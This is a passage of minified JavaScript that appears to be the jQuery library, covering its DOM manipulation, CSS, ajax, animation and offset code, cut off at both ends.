return this.each(function(){var self=jQuery(this),contents=self.contents();if(contents.length){contents.wrapAll(html);}else{self.append(html);}});},wrap:function(html){return this.each(function(){jQuery(this).wrapAll(html);});},unwrap:function(){return this.parent().each(function(){if(!jQuery.nodeName(this,"body")){jQuery(this).replaceWith(this.childNodes);}}).end();},append:function(){return this.domManip(arguments,true,function(elem){if(this.nodeType===1){this.appendChild(elem);}});},prepend:function(){return this.domManip(arguments,true,function(elem){if(this.nodeType===1){this.insertBefore(elem,this.firstChild);}});},before:function(){if(this[0]&&this[0].parentNode){return this.domManip(arguments,false,function(elem){this.parentNode.insertBefore(elem,this);});}else if(arguments.length){var set=jQuery(arguments[0]);set.push.apply(set,this.toArray());return this.pushStack(set,"before",arguments);}},after:function(){if(this[0]&&this[0].parentNode){return this.domManip(arguments,false,function(elem){this.parentNode.insertBefore(elem,this.nextSibling);});}else if(arguments.length){var set=this.pushStack(this,"after",arguments);set.push.apply(set,jQuery(arguments[0]).toArray());return set;}},remove:function(selector,keepData){for(var i=0,elem;(elem=this[i])!=null;i++){if(!selector||jQuery.filter(selector,[elem]).length){if(!keepData&&elem.nodeType===1){jQuery.cleanData(elem.getElementsByTagName("*"));jQuery.cleanData([elem]);}
if(elem.parentNode){elem.parentNode.removeChild(elem);}}}
return this;},empty:function(){for(var i=0,elem;(elem=this[i])!=null;i++){if(elem.nodeType===1){jQuery.cleanData(elem.getElementsByTagName("*"));}
while(elem.firstChild){elem.removeChild(elem.firstChild);}}
return this;},clone:function(events){var ret=this.map(function(){if(!jQuery.support.noCloneEvent&&!jQuery.isXMLDoc(this)){var html=this.outerHTML,ownerDocument=this.ownerDocument;if(!html){var div=ownerDocument.createElement("div");div.appendChild(this.cloneNode(true));html=div.innerHTML;}
return jQuery.clean([html.replace(rinlinejQuery,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(rleadingWhitespace,"")],ownerDocument)[0];}else{return this.cloneNode(true);}});if(events===true){cloneCopyEvent(this,ret);cloneCopyEvent(this.find("*"),ret.find("*"));}
return ret;},html:function(value){if(value===undefined){return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(rinlinejQuery,""):null;}else if(typeof value==="string"&&!rnocache.test(value)&&(jQuery.support.leadingWhitespace||!rleadingWhitespace.test(value))&&!wrapMap[(rtagName.exec(value)||["",""])[1].toLowerCase()]){value=value.replace(rxhtmlTag,fcloseTag);try{for(var i=0,l=this.length;i<l;i++){if(this[i].nodeType===1){jQuery.cleanData(this[i].getElementsByTagName("*"));this[i].innerHTML=value;}}}catch(e){this.empty().append(value);}}else if(jQuery.isFunction(value)){this.each(function(i){var self=jQuery(this),old=self.html();self.empty().append(function(){return value.call(this,i,old);});});}else{this.empty().append(value);}
return this;},replaceWith:function(value){if(this[0]&&this[0].parentNode){if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this),old=self.html();self.replaceWith(value.call(this,i,old));});}
if(typeof value!=="string"){value=jQuery(value).detach();}
return this.each(function(){var next=this.nextSibling,parent=this.parentNode;jQuery(this).remove();if(next){jQuery(next).before(value);}else{jQuery(parent).append(value);}});}else{return this.pushStack(jQuery(jQuery.isFunction(value)?value():value),"replaceWith",value);}},detach:function(selector){return this.remove(selector,true);},domManip:function(args,table,callback){var results,first,value=args[0],scripts=[],fragment,parent;if(!jQuery.support.checkClone&&arguments.length===3&&typeof value==="string"&&rchecked.test(value)){return this.each(function(){jQuery(this).domManip(args,table,callback,true);});}
if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);args[0]=value.call(this,i,table?self.html():undefined);self.domManip(args,table,callback);});}
if(this[0]){parent=value&&value.parentNode;if(jQuery.support.parentNode&&parent&&parent.nodeType===11&&parent.childNodes.length===this.length){results={fragment:parent};}else{results=buildFragment(args,this,scripts);}
fragment=results.fragment;if(fragment.childNodes.length===1){first=fragment=fragment.firstChild;}else{first=fragment.firstChild;}
if(first){table=table&&jQuery.nodeName(first,"tr");for(var i=0,l=this.length;i<l;i++){callback.call(table?root(this[i],first):this[i],i>0||results.cacheable||this.length>1?fragment.cloneNode(true):fragment);}}
if(scripts.length){jQuery.each(scripts,evalScript);}}
return this;function root(elem,cur){return jQuery.nodeName(elem,"table")?(elem.getElementsByTagName("tbody")[0]||elem.appendChild(elem.ownerDocument.createElement("tbody"))):elem;}}});function cloneCopyEvent(orig,ret){var i=0;ret.each(function(){if(this.nodeName!==(orig[i]&&orig[i].nodeName)){return;}
var oldData=jQuery.data(orig[i++]),curData=jQuery.data(this,oldData),events=oldData&&oldData.events;if(events){delete curData.handle;curData.events={};for(var type in events){for(var handler in events[type]){jQuery.event.add(this,type,events[type][handler],events[type][handler].data);}}}});}
function buildFragment(args,nodes,scripts){var fragment,cacheable,cacheresults,doc=(nodes&&nodes[0]?nodes[0].ownerDocument||nodes[0]:document);if(args.length===1&&typeof args[0]==="string"&&args[0].length<512&&doc===document&&!rnocache.test(args[0])&&(jQuery.support.checkClone||!rchecked.test(args[0]))){cacheable=true;cacheresults=jQuery.fragments[args[0]];if(cacheresults){if(cacheresults!==1){fragment=cacheresults;}}}
if(!fragment){fragment=doc.createDocumentFragment();jQuery.clean(args,doc,fragment,scripts);}
if(cacheable){jQuery.fragments[args[0]]=cacheresults?fragment:1;}
return{fragment:fragment,cacheable:cacheable};}
jQuery.fragments={};jQuery.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(name,original){jQuery.fn[name]=function(selector){var ret=[],insert=jQuery(selector),parent=this.length===1&&this[0].parentNode;if(parent&&parent.nodeType===11&&parent.childNodes.length===1&&insert.length===1){insert[original](this[0]);return this;}else{for(var i=0,l=insert.length;i<l;i++){var elems=(i>0?this.clone(true):this).get();jQuery.fn[original].apply(jQuery(insert[i]),elems);ret=ret.concat(elems);}
return this.pushStack(ret,name,insert.selector);}};});jQuery.extend({clean:function(elems,context,fragment,scripts){context=context||document;if(typeof context.createElement==="undefined"){context=context.ownerDocument||context[0]&&context[0].ownerDocument||document;}
var ret=[];for(var i=0,elem;(elem=elems[i])!=null;i++){if(typeof elem==="number"){elem+="";}
if(!elem){continue;}
if(typeof elem==="string"&&!rhtml.test(elem)){elem=context.createTextNode(elem);}else if(typeof elem==="string"){elem=elem.replace(rxhtmlTag,fcloseTag);var tag=(rtagName.exec(elem)||["",""])[1].toLowerCase(),wrap=wrapMap[tag]||wrapMap._default,depth=wrap[0],div=context.createElement("div");div.innerHTML=wrap[1]+elem+wrap[2];while(depth--){div=div.lastChild;}
if(!jQuery.support.tbody){var hasBody=rtbody.test(elem),tbody=tag==="table"&&!hasBody?div.firstChild&&div.firstChild.childNodes:wrap[1]==="<table>"&&!hasBody?div.childNodes:[];for(var j=tbody.length-1;j>=0;--j){if(jQuery.nodeName(tbody[j],"tbody")&&!tbody[j].childNodes.length){tbody[j].parentNode.removeChild(tbody[j]);}}}
if(!jQuery.support.leadingWhitespace&&rleadingWhitespace.test(elem)){div.insertBefore(context.createTextNode(rleadingWhitespace.exec(elem)[0]),div.firstChild);}
elem=div.childNodes;}
if(elem.nodeType){ret.push(elem);}else{ret=jQuery.merge(ret,elem);}}
if(fragment){for(var i=0;ret[i];i++){if(scripts&&jQuery.nodeName(ret[i],"script")&&(!ret[i].type||ret[i].type.toLowerCase()==="text/javascript")){scripts.push(ret[i].parentNode?ret[i].parentNode.removeChild(ret[i]):ret[i]);}else{if(ret[i].nodeType===1){ret.splice.apply(ret,[i+1,0].concat(jQuery.makeArray(ret[i].getElementsByTagName("script"))));}
fragment.appendChild(ret[i]);}}}
return ret;},cleanData:function(elems){var data,id,cache=jQuery.cache,special=jQuery.event.special,deleteExpando=jQuery.support.deleteExpando;for(var i=0,elem;(elem=elems[i])!=null;i++){id=elem[jQuery.expando];if(id){data=cache[id];if(data.events){for(var type in data.events){if(special[type]){jQuery.event.remove(elem,type);}else{removeEvent(elem,type,data.handle);}}}
if(deleteExpando){delete elem[jQuery.expando];}else if(elem.removeAttribute){elem.removeAttribute(jQuery.expando);}
delete cache[id];}}}});var rexclude=/z-?index|font-?weight|opacity|zoom|line-?height/i,ralpha=/alpha\([^)]*\)/,ropacity=/opacity=([^)]*)/,rfloat=/float/i,rdashAlpha=/-([a-z])/ig,rupper=/([A-Z])/g,rnumpx=/^-?\d+(?:px)?$/i,rnum=/^-?\d/,cssShow={position:"absolute",visibility:"hidden",display:"block"},cssWidth=["Left","Right"],cssHeight=["Top","Bottom"],getComputedStyle=document.defaultView&&document.defaultView.getComputedStyle,styleFloat=jQuery.support.cssFloat?"cssFloat":"styleFloat",fcamelCase=function(all,letter){return letter.toUpperCase();};jQuery.fn.css=function(name,value){return access(this,name,value,true,function(elem,name,value){if(value===undefined){return jQuery.curCSS(elem,name);}
if(typeof value==="number"&&!rexclude.test(name)){value+="px";}
jQuery.style(elem,name,value);});};jQuery.extend({style:function(elem,name,value){if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined;}
if((name==="width"||name==="height")&&parseFloat(value)<0){value=undefined;}
var style=elem.style||elem,set=value!==undefined;if(!jQuery.support.opacity&&name==="opacity"){if(set){style.zoom=1;var opacity=parseInt(value,10)+""==="NaN"?"":"alpha(opacity="+value*100+")";var filter=style.filter||jQuery.curCSS(elem,"filter")||"";style.filter=ralpha.test(filter)?filter.replace(ralpha,opacity):opacity;}
return style.filter&&style.filter.indexOf("opacity=")>=0?(parseFloat(ropacity.exec(style.filter)[1])/100)+"":"";}
if(rfloat.test(name)){name=styleFloat;}
name=name.replace(rdashAlpha,fcamelCase);if(set){style[name]=value;}
return style[name];},css:function(elem,name,force,extra){if(name==="width"||name==="height"){var val,props=cssShow,which=name==="width"?cssWidth:cssHeight;function getWH(){val=name==="width"?elem.offsetWidth:elem.offsetHeight;if(extra==="border"){return;}
jQuery.each(which,function(){if(!extra){val-=parseFloat(jQuery.curCSS(elem,"padding"+this,true))||0;}
if(extra==="margin"){val+=parseFloat(jQuery.curCSS(elem,"margin"+this,true))||0;}else{val-=parseFloat(jQuery.curCSS(elem,"border"+this+"Width",true))||0;}});}
if(elem.offsetWidth!==0){getWH();}else{jQuery.swap(elem,props,getWH);}
return Math.max(0,Math.round(val));}
return jQuery.curCSS(elem,name,force);},curCSS:function(elem,name,force){var ret,style=elem.style,filter;if(!jQuery.support.opacity&&name==="opacity"&&elem.currentStyle){ret=ropacity.test(elem.currentStyle.filter||"")?(parseFloat(RegExp.$1)/100)+"":"";return ret===""?"1":ret;}
if(rfloat.test(name)){name=styleFloat;}
if(!force&&style&&style[name]){ret=style[name];}else if(getComputedStyle){if(rfloat.test(name)){name="float";}
name=name.replace(rupper,"-$1").toLowerCase();var defaultView=elem.ownerDocument.defaultView;if(!defaultView){return null;}
var computedStyle=defaultView.getComputedStyle(elem,null);if(computedStyle){ret=computedStyle.getPropertyValue(name);}
if(name==="opacity"&&ret===""){ret="1";}}else if(elem.currentStyle){var camelCase=name.replace(rdashAlpha,fcamelCase);ret=elem.currentStyle[name]||elem.currentStyle[camelCase];if(!rnumpx.test(ret)&&rnum.test(ret)){var left=style.left,rsLeft=elem.runtimeStyle.left;elem.runtimeStyle.left=elem.currentStyle.left;style.left=camelCase==="fontSize"?"1em":(ret||0);ret=style.pixelLeft+"px";style.left=left;elem.runtimeStyle.left=rsLeft;}}
return ret;},swap:function(elem,options,callback){var old={};for(var name in options){old[name]=elem.style[name];elem.style[name]=options[name];}
callback.call(elem);for(var name in options){elem.style[name]=old[name];}}});if(jQuery.expr&&jQuery.expr.filters){jQuery.expr.filters.hidden=function(elem){var width=elem.offsetWidth,height=elem.offsetHeight,skip=elem.nodeName.toLowerCase()==="tr";return width===0&&height===0&&!skip?true:width>0&&height>0&&!skip?false:jQuery.curCSS(elem,"display")==="none";};jQuery.expr.filters.visible=function(elem){return!jQuery.expr.filters.hidden(elem);};}
var jsc=now(),rscript=/<script(.|\s)*?\/script>/gi,rselectTextarea=/select|textarea/i,rinput=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,jsre=/=\?(&|$)/,rquery=/\?/,rts=/(\?|&)_=.*?(&|$)/,rurl=/^(\w+:)?\/\/([^\/?#]+)/,r20=/%20/g,_load=jQuery.fn.load;jQuery.fn.extend({load:function(url,params,callback){if(typeof url!=="string"){return _load.call(this,url);}else if(!this.length){return this;}
var off=url.indexOf(" ");if(off>=0){var selector=url.slice(off,url.length);url=url.slice(0,off);}
var type="GET";if(params){if(jQuery.isFunction(params)){callback=params;params=null;}else if(typeof params==="object"){params=jQuery.param(params,jQuery.ajaxSettings.traditional);type="POST";}}
var self=this;jQuery.ajax({url:url,type:type,dataType:"html",data:params,complete:function(res,status){if(status==="success"||status==="notmodified"){self.html(selector?jQuery("<div />").append(res.responseText.replace(rscript,"")).find(selector):res.responseText);}
if(callback){self.each(callback,[res.responseText,status,res]);}}});return this;},serialize:function(){return jQuery.param(this.serializeArray());},serializeArray:function(){return this.map(function(){return this.elements?jQuery.makeArray(this.elements):this;}).filter(function(){return this.name&&!this.disabled&&(this.checked||rselectTextarea.test(this.nodeName)||rinput.test(this.type));}).map(function(i,elem){var val=jQuery(this).val();return val==null?null:jQuery.isArray(val)?jQuery.map(val,function(val,i){return{name:elem.name,value:val};}):{name:elem.name,value:val};}).get();}});jQuery.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(i,o){jQuery.fn[o]=function(f){return this.bind(o,f);};});jQuery.extend({get:function(url,data,callback,type){if(jQuery.isFunction(data)){type=type||callback;callback=data;data=null;}
return jQuery.ajax({type:"GET",url:url,data:data,success:callback,dataType:type});},getScript:function(url,callback){return jQuery.get(url,null,callback,"script");},getJSON:function(url,data,callback){return jQuery.get(url,data,callback,"json");},post:function(url,data,callback,type){if(jQuery.isFunction(data)){type=type||callback;callback=data;data={};}
return jQuery.ajax({type:"POST",url:url,data:data,success:callback,dataType:type});},ajaxSetup:function(settings){jQuery.extend(jQuery.ajaxSettings,settings);},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:window.XMLHttpRequest&&(window.location.protocol!=="file:"||!window.ActiveXObject)?function(){return new window.XMLHttpRequest();}:function(){try{return new window.ActiveXObject("Microsoft.XMLHTTP");}catch(e){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(origSettings){var s=jQuery.extend(true,{},jQuery.ajaxSettings,origSettings);var jsonp,status,data,callbackContext=origSettings&&origSettings.context||s,type=s.type.toUpperCase();if(s.data&&s.processData&&typeof s.data!=="string"){s.data=jQuery.param(s.data,s.traditional);}
if(s.dataType==="jsonp"){if(type==="GET"){if(!jsre.test(s.url)){s.url+=(rquery.test(s.url)?"&":"?")+(s.jsonp||"callback")+"=?";}}else if(!s.data||!jsre.test(s.data)){s.data=(s.data?s.data+"&":"")+(s.jsonp||"callback")+"=?";}
s.dataType="json";}
if(s.dataType==="json"&&(s.data&&jsre.test(s.data)||jsre.test(s.url))){jsonp=s.jsonpCallback||("jsonp"+jsc++);if(s.data){s.data=(s.data+"").replace(jsre,"="+jsonp+"$1");}
s.url=s.url.replace(jsre,"="+jsonp+"$1");s.dataType="script";window[jsonp]=window[jsonp]||function(tmp){data=tmp;success();complete();window[jsonp]=undefined;try{delete window[jsonp];}catch(e){}
if(head){head.removeChild(script);}};}
if(s.dataType==="script"&&s.cache===null){s.cache=false;}
if(s.cache===false&&type==="GET"){var ts=now();var ret=s.url.replace(rts,"$1_="+ts+"$2");s.url=ret+((ret===s.url)?(rquery.test(s.url)?"&":"?")+"_="+ts:"");}
if(s.data&&type==="GET"){s.url+=(rquery.test(s.url)?"&":"?")+s.data;}
if(s.global&&!jQuery.active++){jQuery.event.trigger("ajaxStart");}
var parts=rurl.exec(s.url),remote=parts&&(parts[1]&&parts[1]!==location.protocol||parts[2]!==location.host);if(s.dataType==="script"&&type==="GET"&&remote){var head=document.getElementsByTagName("head")[0]||document.documentElement;var script=document.createElement("script");script.src=s.url;if(s.scriptCharset){script.charset=s.scriptCharset;}
if(!jsonp){var done=false;script.onload=script.onreadystatechange=function(){if(!done&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){done=true;success();complete();script.onload=script.onreadystatechange=null;if(head&&script.parentNode){head.removeChild(script);}}};}
head.insertBefore(script,head.firstChild);return undefined;}
var requestDone=false;var xhr=s.xhr();if(!xhr){return;}
if(s.username){xhr.open(type,s.url,s.async,s.username,s.password);}else{xhr.open(type,s.url,s.async);}
try{if(s.data||origSettings&&origSettings.contentType){xhr.setRequestHeader("Content-Type",s.contentType);}
if(s.ifModified){if(jQuery.lastModified[s.url]){xhr.setRequestHeader("If-Modified-Since",jQuery.lastModified[s.url]);}
if(jQuery.etag[s.url]){xhr.setRequestHeader("If-None-Match",jQuery.etag[s.url]);}}
if(!remote){xhr.setRequestHeader("X-Requested-With","XMLHttpRequest");}
xhr.setRequestHeader("Accept",s.dataType&&s.accepts[s.dataType]?s.accepts[s.dataType]+", */*":s.accepts._default);}catch(e){}
if(s.beforeSend&&s.beforeSend.call(callbackContext,xhr,s)===false){if(s.global&&!--jQuery.active){jQuery.event.trigger("ajaxStop");}
xhr.abort();return false;}
if(s.global){trigger("ajaxSend",[xhr,s]);}
var onreadystatechange=xhr.onreadystatechange=function(isTimeout){if(!xhr||xhr.readyState===0||isTimeout==="abort"){if(!requestDone){complete();}
requestDone=true;if(xhr){xhr.onreadystatechange=jQuery.noop;}}else if(!requestDone&&xhr&&(xhr.readyState===4||isTimeout==="timeout")){requestDone=true;xhr.onreadystatechange=jQuery.noop;status=isTimeout==="timeout"?"timeout":!jQuery.httpSuccess(xhr)?"error":s.ifModified&&jQuery.httpNotModified(xhr,s.url)?"notmodified":"success";var errMsg;if(status==="success"){try{data=jQuery.httpData(xhr,s.dataType,s);}catch(err){status="parsererror";errMsg=err;}}
if(status==="success"||status==="notmodified"){if(!jsonp){success();}}else{jQuery.handleError(s,xhr,status,errMsg);}
complete();if(isTimeout==="timeout"){xhr.abort();}
if(s.async){xhr=null;}}};try{var oldAbort=xhr.abort;xhr.abort=function(){if(xhr){oldAbort.call(xhr);}
onreadystatechange("abort");};}catch(e){}
if(s.async&&s.timeout>0){setTimeout(function(){if(xhr&&!requestDone){onreadystatechange("timeout");}},s.timeout);}
try{xhr.send(type==="POST"||type==="PUT"||type==="DELETE"?s.data:null);}catch(e){jQuery.handleError(s,xhr,null,e);complete();}
if(!s.async){onreadystatechange();}
function success(){if(s.success){s.success.call(callbackContext,data,status,xhr);}
if(s.global){trigger("ajaxSuccess",[xhr,s]);}}
function complete(){if(s.complete){s.complete.call(callbackContext,xhr,status);}
if(s.global){trigger("ajaxComplete",[xhr,s]);}
if(s.global&&!--jQuery.active){jQuery.event.trigger("ajaxStop");}}
function trigger(type,args){(s.context?jQuery(s.context):jQuery.event).trigger(type,args);}
return xhr;},handleError:function(s,xhr,status,e){if(s.error){s.error.call(s.context||s,xhr,status,e);}
if(s.global){(s.context?jQuery(s.context):jQuery.event).trigger("ajaxError",[xhr,s,e]);}},active:0,httpSuccess:function(xhr){try{return!xhr.status&&location.protocol==="file:"||(xhr.status>=200&&xhr.status<300)||xhr.status===304||xhr.status===1223||xhr.status===0;}catch(e){}
return false;},httpNotModified:function(xhr,url){var lastModified=xhr.getResponseHeader("Last-Modified"),etag=xhr.getResponseHeader("Etag");if(lastModified){jQuery.lastModified[url]=lastModified;}
if(etag){jQuery.etag[url]=etag;}
return xhr.status===304||xhr.status===0;},httpData:function(xhr,type,s){var ct=xhr.getResponseHeader("content-type")||"",xml=type==="xml"||!type&&ct.indexOf("xml")>=0,data=xml?xhr.responseXML:xhr.responseText;if(xml&&data.documentElement.nodeName==="parsererror"){jQuery.error("parsererror");}
if(s&&s.dataFilter){data=s.dataFilter(data,type);}
if(typeof data==="string"){if(type==="json"||!type&&ct.indexOf("json")>=0){data=jQuery.parseJSON(data);}else if(type==="script"||!type&&ct.indexOf("javascript")>=0){jQuery.globalEval(data);}}
return data;},param:function(a,traditional){var s=[];if(traditional===undefined){traditional=jQuery.ajaxSettings.traditional;}
if(jQuery.isArray(a)||a.jquery){jQuery.each(a,function(){add(this.name,this.value);});}else{for(var prefix in a){buildParams(prefix,a[prefix]);}}
return s.join("&").replace(r20,"+");function buildParams(prefix,obj){if(jQuery.isArray(obj)){jQuery.each(obj,function(i,v){if(traditional||/\[\]$/.test(prefix)){add(prefix,v);}else{buildParams(prefix+"["+(typeof v==="object"||jQuery.isArray(v)?i:"")+"]",v);}});}else if(!traditional&&obj!=null&&typeof obj==="object"){jQuery.each(obj,function(k,v){buildParams(prefix+"["+k+"]",v);});}else{add(prefix,obj);}}
function add(key,value){value=jQuery.isFunction(value)?value():value;s[s.length]=encodeURIComponent(key)+"="+encodeURIComponent(value);}}});var elemdisplay={},rfxtypes=/toggle|show|hide/,rfxnum=/^([+-]=)?([\d+-.]+)(.*)$/,timerId,fxAttrs=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];jQuery.fn.extend({show:function(speed,callback){if(speed||speed===0){return this.animate(genFx("show",3),speed,callback);}else{for(var i=0,l=this.length;i<l;i++){var old=jQuery.data(this[i],"olddisplay");this[i].style.display=old||"";if(jQuery.css(this[i],"display")==="none"){var nodeName=this[i].nodeName,display;if(elemdisplay[nodeName]){display=elemdisplay[nodeName];}else{var elem=jQuery("<"+nodeName+" />").appendTo("body");display=elem.css("display");if(display==="none"){display="block";}
elem.remove();elemdisplay[nodeName]=display;}
jQuery.data(this[i],"olddisplay",display);}}
for(var j=0,k=this.length;j<k;j++){this[j].style.display=jQuery.data(this[j],"olddisplay")||"";}
return this;}},hide:function(speed,callback){if(speed||speed===0){return this.animate(genFx("hide",3),speed,callback);}else{for(var i=0,l=this.length;i<l;i++){var old=jQuery.data(this[i],"olddisplay");if(!old&&old!=="none"){jQuery.data(this[i],"olddisplay",jQuery.css(this[i],"display"));}}
for(var j=0,k=this.length;j<k;j++){this[j].style.display="none";}
return this;}},_toggle:jQuery.fn.toggle,toggle:function(fn,fn2){var bool=typeof fn==="boolean";if(jQuery.isFunction(fn)&&jQuery.isFunction(fn2)){this._toggle.apply(this,arguments);}else if(fn==null||bool){this.each(function(){var state=bool?fn:jQuery(this).is(":hidden");jQuery(this)[state?"show":"hide"]();});}else{this.animate(genFx("toggle",3),fn,fn2);}
return this;},fadeTo:function(speed,to,callback){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:to},speed,callback);},animate:function(prop,speed,easing,callback){var optall=jQuery.speed(speed,easing,callback);if(jQuery.isEmptyObject(prop)){return this.each(optall.complete);}
return this[optall.queue===false?"each":"queue"](function(){var opt=jQuery.extend({},optall),p,hidden=this.nodeType===1&&jQuery(this).is(":hidden"),self=this;for(p in prop){var name=p.replace(rdashAlpha,fcamelCase);if(p!==name){prop[name]=prop[p];delete prop[p];p=name;}
if(prop[p]==="hide"&&hidden||prop[p]==="show"&&!hidden){return opt.complete.call(this);}
if((p==="height"||p==="width")&&this.style){opt.display=jQuery.css(this,"display");opt.overflow=this.style.overflow;}
if(jQuery.isArray(prop[p])){(opt.specialEasing=opt.specialEasing||{})[p]=prop[p][1];prop[p]=prop[p][0];}}
if(opt.overflow!=null){this.style.overflow="hidden";}
opt.curAnim=jQuery.extend({},prop);jQuery.each(prop,function(name,val){var e=new jQuery.fx(self,opt,name);if(rfxtypes.test(val)){e[val==="toggle"?hidden?"show":"hide":val](prop);}else{var parts=rfxnum.exec(val),start=e.cur(true)||0;if(parts){var end=parseFloat(parts[2]),unit=parts[3]||"px";if(unit!=="px"){self.style[name]=(end||1)+unit;start=((end||1)/e.cur(true))*start;self.style[name]=start+unit;}
if(parts[1]){end=((parts[1]==="-="?-1:1)*end)+start;}
e.custom(start,end,unit);}else{e.custom(start,val,"");}}});return true;});},stop:function(clearQueue,gotoEnd){var timers=jQuery.timers;if(clearQueue){this.queue([]);}
this.each(function(){for(var i=timers.length-1;i>=0;i--){if(timers[i].elem===this){if(gotoEnd){timers[i](true);}
timers.splice(i,1);}}});if(!gotoEnd){this.dequeue();}
return this;}});jQuery.each({slideDown:genFx("show",1),slideUp:genFx("hide",1),slideToggle:genFx("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(name,props){jQuery.fn[name]=function(speed,callback){return this.animate(props,speed,callback);};});jQuery.extend({speed:function(speed,easing,fn){var opt=speed&&typeof speed==="object"?speed:{complete:fn||!fn&&easing||jQuery.isFunction(speed)&&speed,duration:speed,easing:fn&&easing||easing&&!jQuery.isFunction(easing)&&easing};opt.duration=jQuery.fx.off?0:typeof opt.duration==="number"?opt.duration:jQuery.fx.speeds[opt.duration]||jQuery.fx.speeds._default;opt.old=opt.complete;opt.complete=function(){if(opt.queue!==false){jQuery(this).dequeue();}
if(jQuery.isFunction(opt.old)){opt.old.call(this);}};return opt;},easing:{linear:function(p,n,firstNum,diff){return firstNum+diff*p;},swing:function(p,n,firstNum,diff){return((-Math.cos(p*Math.PI)/2)+0.5)*diff+firstNum;}},timers:[],fx:function(elem,options,prop){this.options=options;this.elem=elem;this.prop=prop;if(!options.orig){options.orig={};}}});jQuery.fx.prototype={update:function(){if(this.options.step){this.options.step.call(this.elem,this.now,this);}
(jQuery.fx.step[this.prop]||jQuery.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style){this.elem.style.display="block";}},cur:function(force){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null)){return this.elem[this.prop];}
var r=parseFloat(jQuery.css(this.elem,this.prop,force));return r&&r>-10000?r:parseFloat(jQuery.curCSS(this.elem,this.prop))||0;},custom:function(from,to,unit){this.startTime=now();this.start=from;this.end=to;this.unit=unit||this.unit||"px";this.now=this.start;this.pos=this.state=0;var self=this;function t(gotoEnd){return self.step(gotoEnd);}
t.elem=this.elem;if(t()&&jQuery.timers.push(t)&&!timerId){timerId=setInterval(jQuery.fx.tick,13);}},show:function(){this.options.orig[this.prop]=jQuery.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());jQuery(this.elem).show();},hide:function(){this.options.orig[this.prop]=jQuery.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0);},step:function(gotoEnd){var t=now(),done=true;if(gotoEnd||t>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var i in this.options.curAnim){if(this.options.curAnim[i]!==true){done=false;}}
if(done){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;var old=jQuery.data(this.elem,"olddisplay");this.elem.style.display=old?old:this.options.display;if(jQuery.css(this.elem,"display")==="none"){this.elem.style.display="block";}}
if(this.options.hide){jQuery(this.elem).hide();}
if(this.options.hide||this.options.show){for(var p in this.options.curAnim){jQuery.style(this.elem,p,this.options.orig[p]);}}
this.options.complete.call(this.elem);}
return false;}else{var n=t-this.startTime;this.state=n/this.options.duration;var specialEasing=this.options.specialEasing&&this.options.specialEasing[this.prop];var defaultEasing=this.options.easing||(jQuery.easing.swing?"swing":"linear");this.pos=jQuery.easing[specialEasing||defaultEasing](this.state,n,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update();}
return true;}};jQuery.extend(jQuery.fx,{tick:function(){var timers=jQuery.timers;for(var i=0;i<timers.length;i++){if(!timers[i]()){timers.splice(i--,1);}}
if(!timers.length){jQuery.fx.stop();}},stop:function(){clearInterval(timerId);timerId=null;},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(fx){jQuery.style(fx.elem,"opacity",fx.now);},_default:function(fx){if(fx.elem.style&&fx.elem.style[fx.prop]!=null){fx.elem.style[fx.prop]=(fx.prop==="width"||fx.prop==="height"?Math.max(0,fx.now):fx.now)+fx.unit;}else{fx.elem[fx.prop]=fx.now;}}}});if(jQuery.expr&&jQuery.expr.filters){jQuery.expr.filters.animated=function(elem){return jQuery.grep(jQuery.timers,function(fn){return elem===fn.elem;}).length;};}
function genFx(type,num){var obj={};jQuery.each(fxAttrs.concat.apply([],fxAttrs.slice(0,num)),function(){obj[this]=type;});return obj;}
if("getBoundingClientRect"in document.documentElement){jQuery.fn.offset=function(options){var elem=this[0];if(options){return this.each(function(i){jQuery.offset.setOffset(this,options,i);});}
if(!elem||!elem.ownerDocument){return null;}
if(elem===elem.ownerDocument.body){return jQuery.offset.bodyOffset(elem);}
var box=elem.getBoundingClientRect(),doc=elem.ownerDocument,body=doc.body,docElem=doc.documentElement,clientTop=docElem.clientTop||body.clientTop||0,clientLeft=docElem.clientLeft||body.clientLeft||0,top=box.top+(self.pageYOffset||jQuery.support.boxModel&&docElem.scrollTop||body.scrollTop)-clientTop,left=box.left+(self.pageXOffset||jQuery.support.boxModel&&docElem.scrollLeft||body.scrollLeft)-clientLeft;return{top:top,left:left};};}else{jQuery.fn.offset=function(options){var elem=this[0];if(options){return this.each(function(i){jQuery.offset.setOffset(this,options,i);});}
if(!elem||!elem.ownerDocument){return null;}
if(elem===elem.ownerDocument.body){return jQuery.offset.bodyOffset(elem);}
jQuery.offset.initialize();var offsetParent=elem.offsetParent,prevOffsetParent=elem,doc=elem.ownerDocument,computedStyle,docElem=doc.documentElement,body=doc.body,defaultView=doc.defaultView,prevComputedStyle=defaultView?defaultView.getComputedStyle(elem,null):elem.currentStyle,top=elem.offsetTop,left=elem.offsetLeft;while((elem=elem.parentNode)&&elem!==body&&elem!==docElem){if(jQuery.offset.supportsFixedPosition&&prevComputedStyle.position==="fixed"){break;}
